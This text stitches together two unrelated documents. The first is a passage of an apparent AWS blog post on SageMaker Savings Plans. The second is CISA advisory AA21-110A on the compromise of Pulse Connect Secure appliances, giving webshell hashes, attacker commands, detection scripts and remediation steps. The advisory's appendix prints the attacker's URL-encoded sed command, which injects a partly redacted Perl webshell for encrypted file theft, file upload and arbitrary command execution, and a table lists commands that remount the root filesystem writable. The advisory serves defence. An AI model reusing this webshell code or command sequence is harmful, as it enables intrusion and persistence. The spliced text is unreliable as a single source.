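The same recommendations are available programmatically through the Cost Explorer API, which can be handy if you track costs in code. Below is a hedged boto3 sketch; the `SAGEMAKER_SP` plan type and the exact parameter values are assumptions to verify against the current API documentation.

```python
import boto3

ce = boto3.client("ce", region_name="us-east-1")  # Cost Explorer

# Ask for a SageMaker Savings Plans recommendation: 1-year term, no upfront,
# based on the last 7 days of usage, at the payer (organization) level.
response = ce.get_savings_plans_purchase_recommendation(
    SavingsPlansType="SAGEMAKER_SP",
    TermInYears="ONE_YEAR",
    PaymentOption="NO_UPFRONT",
    LookbackPeriodInDays="SEVEN_DAYS",
    AccountScope="PAYER",
)

summary = response["SavingsPlansPurchaseRecommendation"].get(
    "SavingsPlansPurchaseRecommendationSummary", {})
print("Recommended hourly commitment:", summary.get("HourlyCommitmentToPurchase"))
print("Estimated monthly savings:   ", summary.get("EstimatedMonthlySavingsAmount"))
```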

Now, let’s do a quick demo, and see how I could optimize my own SageMaker spend.

Recommending Savings Plans for Amazon SageMaker
Opening the AWS Cost Management Console, I see a Savings Plans menu on the left.

Cost management console

Clicking on Recommendations, I select SageMaker Savings Plans.

Looking at the available options, I select Payer to optimize cost at the Organizations level, a 1-year term, a No upfront payment, and 7 days of past usage (as I’ve just ramped up my SageMaker usage).

SageMaker Savings Plan

Immediately, I see that I could reduce my SageMaker costs by 20%, saving $897.63 every month. This would only require a 1-year commitment of $3.804 per hour.

SageMaker Savings Plan

The monthly charge on my AWS bill would be $2,776 ($3.804 * 24 hours * 365 days / 12 months), plus any additional on-demand costs should my actual usage exceed the commitment. Pretty tempting, especially with no upfront required at all.
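If you want to sanity-check these numbers yourself, the arithmetic is just the hourly commitment spread over an average month. A tiny Python helper:

```python
def monthly_commitment(hourly_rate: float) -> float:
    """Average monthly charge for a Savings Plans hourly commitment."""
    return hourly_rate * 24 * 365 / 12

print(round(monthly_commitment(3.804)))  # ~2777, the 1-year plan above
print(round(monthly_commitment(2.765)))  # ~2018, the 3-year plan below
```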

Moving to a 3-year plan (still no upfront), I could save $1,790.19 per month, and enjoy 41% savings thanks to a $2.765 per hour commitment.

SageMaker Savings Plan

I could add this plan to the cart as is, and complete my purchase. Every month for 3 years, I would be charged $2,018 ($2.765 * 24 * 365 / 12), plus additional on-demand cost.

As mentioned earlier, I can also create my own plan in just a few clicks. Let me show you how.

Creating Savings Plans for Amazon SageMaker
In the left-hand menu, I click on Purchase Savings Plans and I select SageMaker Savings Plans.

SageMaker Savings Plan

I pick a 1-year term without any upfront. As I expect to rationalize my SageMaker usage a bit in the coming months, I go for a commitment of $3 per hour, instead of the $3.804 recommendation. Then, I add the plan to the cart.

SageMaker Savings Plan

Confirming that I’m fine with an optimized monthly payment of $2,190, I submit my order.

SageMaker Savings Plan

The plan is now active, and I’ll see the savings on my next AWS bill. Thanks to utilization reports available in the Savings Plans console, I’ll also see the percentage of my commitment that I’ve actually used. Likewise, coverage reports will show me how much of my eligible spend has been covered by the plan.
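If you manage commitments as code, the Savings Plans API offers the same flow. The sketch below is a rough outline with boto3: find a matching SageMaker Savings Plans offering, then purchase it with a custom commitment. Parameter names and filter values are assumptions to check against the Savings Plans API reference before use.

```python
import boto3
import uuid

sp = boto3.client("savingsplans", region_name="us-east-1")

# Find a 1-year, no-upfront SageMaker Savings Plans offering (filter values are assumptions).
offerings = sp.describe_savings_plans_offerings(
    planTypes=["SageMaker"],
    paymentOptions=["No Upfront"],
    durations=[31536000],          # one year, in seconds
)["searchResults"]

offering_id = offerings[0]["offeringId"]

# Purchase the plan with a $3/hour commitment, matching the console example above.
sp.create_savings_plan(
    savingsPlanOfferingId=offering_id,
    commitment="3.00",
    clientToken=str(uuid.uuid4()),
)
```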

Getting Started
Thanks to price reductions for CPU and GPU instances and to SageMaker Savings Plans, you can now further optimize your SageMaker costs in an easy and predictable way. ML on AWS has never been more cost effective.

Price reductions and SageMaker Savings Plans are available today in the following AWS regions:

  • Americas: US East (N. Virginia), US East (Ohio), US West (Oregon), US West (N. California), AWS GovCloud (US-West), Canada (Central), South America (São Paulo).
  • Europe, Middle East and Africa: Europe (Ireland), Europe (Frankfurt), Europe (London), Europe (Paris), Europe (Stockholm), Europe (Milan), Africa (Cape Town), Middle East (Bahrain).
  • Asia Pacific: Asia Pacific (Singapore), Asia Pacific (Tokyo), Asia Pacific (Sydney), Asia Pacific (Seoul), Asia Pacific (Mumbai), and Asia Pacific (Hong Kong).

Give them a try, and let us know what you think. As always, we’re looking forward to your feedback. You can send it to your usual AWS Support contacts, or on the AWS Forum for Amazon SageMaker.

– Julien

AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities

Original release date: April 20, 2021

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Ivanti Integrity Checker Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.

Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Ivanti Integrity Checker Tool, update to the latest software version, and investigate for malicious activity.

Technical Details

On March 31, 2021, Ivanti released an Integrity Checker Tool to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states:

We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE- 2020- 8260). For more information visit KB44764 (Customer FAQ).

The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:

  • DSUpgrade.pm MD5: 4d5b410e1756072a701dfd3722951907
    • Runs arbitrary commands passed to it
    • Copies malicious code into Licenseserverproto.cgi
  • Licenseserverproto.cgi MD5: 9b526db005ee8075912ca6572d69a5d6
    • Copies malicious logic to the new files during the patching process, allowing for persistence
  • Secid_canceltoken.cgi MD5: f2beca612db26d771fe6ed7a87f48a5a
    • Runs arbitrary commands passed via HTTP requests
  • compcheckresult.cgi MD5: ca0175d86049fa7c796ea06b413857a3
    • Publicly-facing page to send arbitrary commands with ID argument
  • Login.cgi MD5: 56e2a1566c7989612320f4ef1669e7d5
    • Allows for credential harvesting of authenticated users
  • Healthcheck.cgi MD5: 8c291ad2d50f3845788bc11b2f603b4a
    • Runs arbitrary commands passed via HTTP requests

Other files were found with additional functionality:

  • libdsplibs.so MD5: 416488b6c8a9bdb9c0cb592e36f44677
    • Trojanized shared object to bypass multi-factor authentication via a hard-coded backdoor key.
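The MD5 hashes above can be used directly as indicators of compromise. The Python sketch below computes MD5s for local copies of the named files and compares them to the advisory’s hashes; the base directory is a placeholder, a hash match is evidence of the trojanized version, and a mismatch alone does not prove a file is clean.

```python
import hashlib
from pathlib import Path

# Known-bad MD5s taken from this advisory (file name -> hash).
# Note: capitalization on the appliance may differ from what is listed here.
IOC_HASHES = {
    "DSUpgrade.pm": "4d5b410e1756072a701dfd3722951907",
    "Licenseserverproto.cgi": "9b526db005ee8075912ca6572d69a5d6",
    "Secid_canceltoken.cgi": "f2beca612db26d771fe6ed7a87f48a5a",
    "compcheckresult.cgi": "ca0175d86049fa7c796ea06b413857a3",
    "Login.cgi": "56e2a1566c7989612320f4ef1669e7d5",
    "Healthcheck.cgi": "8c291ad2d50f3845788bc11b2f603b4a",
    "libdsplibs.so": "416488b6c8a9bdb9c0cb592e36f44677",
}

# Placeholder path to an offline copy of the appliance's file system.
BASE_DIR = Path("/mnt/pcs-image")

for name, bad_md5 in IOC_HASHES.items():
    for path in BASE_DIR.rglob(name):
        digest = hashlib.md5(path.read_bytes()).hexdigest()
        status = "MATCHES known-bad hash" if digest == bad_md5 else "does not match"
        print(f"{path}: {digest} ({status})")
```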

Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log, as seen in the following format; URIs have been redacted to minimize access to webshells that may still be active:

Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.
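A small parser for that log format can make triage faster. The Python sketch below extracts the requested URI, the URL-encoded command passed in the `id` parameter, and the source IP from lines shaped like the example above; it is illustrative, and real log lines may differ slightly.

```python
import re
from urllib.parse import unquote

LOG_PATTERN = re.compile(
    r"Unauthenticated request url (?P<uri>\S+) came from IP (?P<ip>[0-9a-fA-F:.]+)"
)

def parse_unauthenticated_requests(lines):
    """Yield (uri, decoded id parameter, source IP) for matching log lines."""
    for line in lines:
        match = LOG_PATTERN.search(line)
        if not match:
            continue
        uri = match.group("uri")
        # Pull out and URL-decode the ?id= command, if present.
        command = ""
        if "?id=" in uri:
            command = unquote(uri.split("?id=", 1)[1])
        yield uri, command, match.group("ip")

# Illustrative sample line; the file name and IP are hypothetical.
sample = ("Unauthenticated request url /dana-na/example.cgi"
          "?id=cat%20/home/webserver/htdocs/dana-na/example.cgi came from IP 192.0.2.1")
for uri, command, ip in parse_unauthenticated_requests([sample]):
    print(f"{ip} requested {uri.split('?')[0]} -> {command}")
```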

The threat actor then ran the commands listed in table 1 via the webshell.

Table 1: Commands run via webshell

Time                            Command
2021-01-19T07:46:05.000+0000    pwd
2021-01-19T07:46:24.000+0000    cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T08:10:13.000+0000    cat%20/home/webserver/htdocs/dana-na/l[redacted]
2021-01-19T08:14:18.000+0000    See Appendix.
2021-01-19T08:15:11.000+0000    cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T08:15:49.000+0000    cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T09:03:05.000+0000    cat%20/home/webserver/htdocs/dana-na/[redacted]
2021-01-19T09:04:47.000+0000    $mount
2021-01-19T09:05:13.000+0000    /bin/mount%20-o%20remount,rw%20/dev/root%20/
2021-01-19T09:07:10.000+0000    $mount


The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity.

Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.

Mitigations

CISA strongly urges organizations using Pulse Secure devices to immediately:

If the Integrity Checker Tool finds mismatched or unauthorized files, CISA urges organizations to:

  • Contact CISA to report your findings (see Contact Information section below).
  • Contact Ivanti Pulse Secure for assistance in capturing forensic information.
  • Review “Unauthenticated Web Requests” log for evidence of exploitation, if enabled.
  • Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts, and any accounts that could be modified by any account described above; all of these accounts should be assumed to be compromised). Note: Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched.
  • Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance’s VPN lease pool.
  • Look for unauthorized applications and scheduled tasks in their environment.
  • Ensure no new administrators were created or non-privileged users were added to privileged groups.
  • Remove any remote access programs not approved by the organization.
  • Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment.

In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in KB44764 – Customer FAQ: PCS Security Integrity Tool Enhancements, which includes:

After preservation, you can remediate your Pulse Connect Secure appliance by: 

  1. Disabling the external-facing interface.  
  2. Saving the system and user config.
  3. Performing a factory reset via the Serial Console. Note: For more information refer to KB22964 (How to reset a PCS device to the factory default setting via the serial console)
  4. Updating the appliance to the newest version.
  5. Re-importing the saved config.   
  6. Re-enabling the external interface. 

CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Ivanti Integrity Checker Tool again after remediation has taken place.

Contact Information

CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at

  • 1-888-282-0870 (From outside the United States: +1-703-235-8832)
  • central@cisa.dhs.gov (UNCLASS)
  • us-cert@dhs.sgov.gov (SIPRNET)
  • us-cert@dhs.ic.gov (JWICS)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.

Appendix: Large sed Command Found In Unauthenticated Logs

Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20$n=$_[0];my%20$rs;for%20(my%20$i=0;$i%3C$n;$i++){my%20$n1=int(rand(256));$rs.=chr($n1);}return%20$rs;}sub%20a{my%20$st=$_[0];my%20$k=r([redacted]);my%20$en%20=%20RC4(%20$k.$ph,%20$st);return%20encode_base64($k.$en);}sub%20b{my%20$s=%20decode_base64($_[0]);%20my%20$l=length($s);my%20$k=%20substr($s,0,[redacted]);my%20$en=substr($s,[redacted],$l-[redacted]);my%20$de%20=%20RC4(%20$k.$ph,%20$en%20);return%20$de;}sub%20c{my%20$fi=CGI::param(%27img%27);my%20$FN=b($fi);my%20$fd;print%20%22Content-type:%20application/x-downloadn%22;open(*FILE,%20%22%3C$FN%22%20);while(%3CFILE%3E){$fd=$fd.$_;}close(*FILE);print%20%22Content-Disposition:%20attachment;%20filename=tmpnn%22;print%20a($fd);}sub%20d{print%20%22Cache-Control:%20no-cachen%22;print%20%22Content-type:%20text/htmlnn%22;my%20$fi%20=%20CGI::param(%27cert%27);$fi=b($fi);my%20$pa=CGI::param(%27md5%27);$pa=b($pa);open%20(*outfile,%20%22%3E$pa%22);print%20outfile%20$fi;close%20(*outfile);}sub%20e{print%20%22Cache-Control:%20no-cachen%22;print%20%22Content-type:%20image/gifnn%22;my%20$na=CGI::param(%27name%27);$na=b($na);my%20$rt;if%20(!$na%20or%20$na%20eq%20%22cd%22)%20{$rt=%22Error%20404%22;}else%20{my%20$ot=%22/tmp/1%22;system(%22$na%20%3E/tmp/1%202%3E&1%22);open(*cmd_result,%22%3C$ot%22);while(%3Ccmd_result%3E){$rt=$rt.$_;}close(*cmd_result);unlink%20$ot}%20%20print%20a($rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20%22%22){e();}else{%20%20%20&main();}}if%20($ENV{%27REQUEST_METHOD%27}%20eq%20%22POST%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX

References

Revisions

  • Initial version: April 20, 2021

This product is provided subject to this Notification and this Privacy & Use policy.